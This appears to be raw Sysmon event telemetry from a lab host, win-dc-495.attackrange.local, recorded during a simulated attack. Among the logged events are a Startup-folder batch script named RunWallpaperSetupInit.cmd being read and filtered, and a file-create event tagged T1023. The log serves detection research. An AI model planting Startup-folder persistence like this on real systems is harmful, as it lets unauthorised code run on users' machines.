354300x800000000000000013478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.826{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local65514-false169.254.169.254-80http 734700x800000000000000013477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.352{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\System32\efsui.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x800000000000000013476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.493{59A5CD1D-93FA-6005-FA04-00000000A301}2120C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x800000000000000013483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:52.599{59A5CD1D-940F-6005-0C05-00000000A301}6476ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Internet Explorer\iexplore.exe 22542200x800000000000000013482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:52.569{59A5CD1D-940F-6005-0C05-00000000A301}6476go.microsoft.com0type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:104.125.79.182;C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:54.741{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:54.011{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.197.79.204.in-addr.arpa.0type: 12 a-0001.a-msedge.net;C:\Windows\sysmon64.exe 22542200x800000000000000013501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:52.649{59A5CD1D-940F-6005-0C05-00000000A301}6476ieonline.microsoft.com0type: 5 any.edge.bing.com;::ffff:204.79.197.200;C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-9416-6005-1305-00000000A301}69126916C:\Windows\system32\cmd.exe{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+4917|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.081{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /v DELETEME C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x800000000000000013492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:58:55.069{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd2021-01-18 13:58:55.069 10341000x800000000000000013490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-9416-6005-1305-00000000A301}69126916C:\Windows\system32\cmd.exe{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+484b|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.077{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x800000000000000013508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.351{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.335{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.335{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.335{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\system32\wininetlui.dll+1cf4(wow64)|C:\Windows\system32\wininetlui.dll+1a52(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6161(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6d70(wow64)|C:\Windows\SYSTEM32\WININET.dll+2b5d83(wow64)|C:\Windows\SYSTEM32\WININET.dll+26a9b1(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+146b46(wow64) 10341000x800000000000000013504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.163{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.163{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.038{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.029{59A5CD1D-9410-6005-0E05-00000000A301}6584www.bing.com0type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 www-bing-com.dual-a-0001.a-msedge.net;type: 5 